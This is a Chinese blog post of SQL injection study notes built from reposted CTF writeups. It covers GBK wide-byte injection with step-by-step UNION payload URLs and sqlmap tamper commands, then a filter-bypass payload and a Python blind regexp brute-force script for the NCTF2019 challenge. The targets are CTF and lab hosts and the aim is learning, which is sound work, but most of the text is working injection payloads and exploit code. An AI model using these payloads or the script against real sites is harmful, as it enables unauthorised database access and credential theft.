随缘更新~记录下sql注入学习的笔记
宽字节注入
本块内容转载自
https://blog.csdn.net/dyw_666666/article/details/88676863
宽字节注入指的是mysql数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为\',其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是'運',从而使单引号闭合(逃逸),进行注入攻击。
题目地址:http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
手工注入
判断列数
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23
当列数是3报错,所以有两列
各类信息
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23
库名
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23
表名
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,group_concat(table_name)
from information_schema.tables
where table_schema=database()%23
列名
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,group_concat(column_name)
from information_schema.columns
where table_name=0x63746634%23
这里需要将ctf4转换为16进制,转换完后需要加上0x
列中的数据
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
union select 2,(select flag from ctf4)%23
SQLmap跑法
需要使用一个脚本unmagicquotes.py
查看有哪些库
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs
表名
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables
列名
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns
列中的数据
sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag
SQL注入绕过
题目为NCTF2019的SQLi
内容转载自https://ctf.ieki.xyz/contest/nctf2019.html ,p3rh4ps的writeup
这里贴出一篇绕过技巧的文章
- 这道题ban掉
'
以及注释方法(如#
--
),使得常见的方法对于最后的passwd的闭合都无效了
- 然后这里的bypass技巧是单引号可以使用\来转义绕过,or可以采用||,=可以采用regexp , 最后的单引号闭合;%00可以闭合,
- payload
username=\
passwd=||(passwd/**/regexp/**/"^xxxxx")%00
下面是通过脚本按位爆破
import requests
url='http://f9a74750-92dc-407e-96a7-eda6b4a9b507.node3.buuoj.cn'
#print(data['username'])
#print(data['passwd'])
def str2hex(string):
c='0x'
a=''
for i in string:
a+=hex(ord(i))
return c+a.replace('0x','')
def sqli(payload):
poc='||passwd/**/REGEXP/**/{};\x00'.format(payload)
data = {
'username': '\\',
'passwd': poc
}
# print(data['passwd'])
a=requests.post(url, data=data, allow_redirects=False)
# print(requests.post(url,data=data,allow_redirects=False).status_code)
if a.status_code==302:
return payload
if a.status_code!=200 and a.status_code!=302:
return sqli(payload)
return ''
alphabet = ['!','|','[',']','{','}','_','/','-','&',"%",'#','@','a','b','c','d','e','f','g','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
password='^'
#test=str2hex('^y')
#sqli(test)
while True:
for i in alphabet:
mid=password+i
#print(mid)
a=str2hex(mid)
#print(a)
b=sqli(a)
if b!='':
password+=i
break
print(password.replace('^',''))
得到密码you_will_never_know7788990,然后使用用户名\加上得到的密码登录得到flag
Comments | NOTHING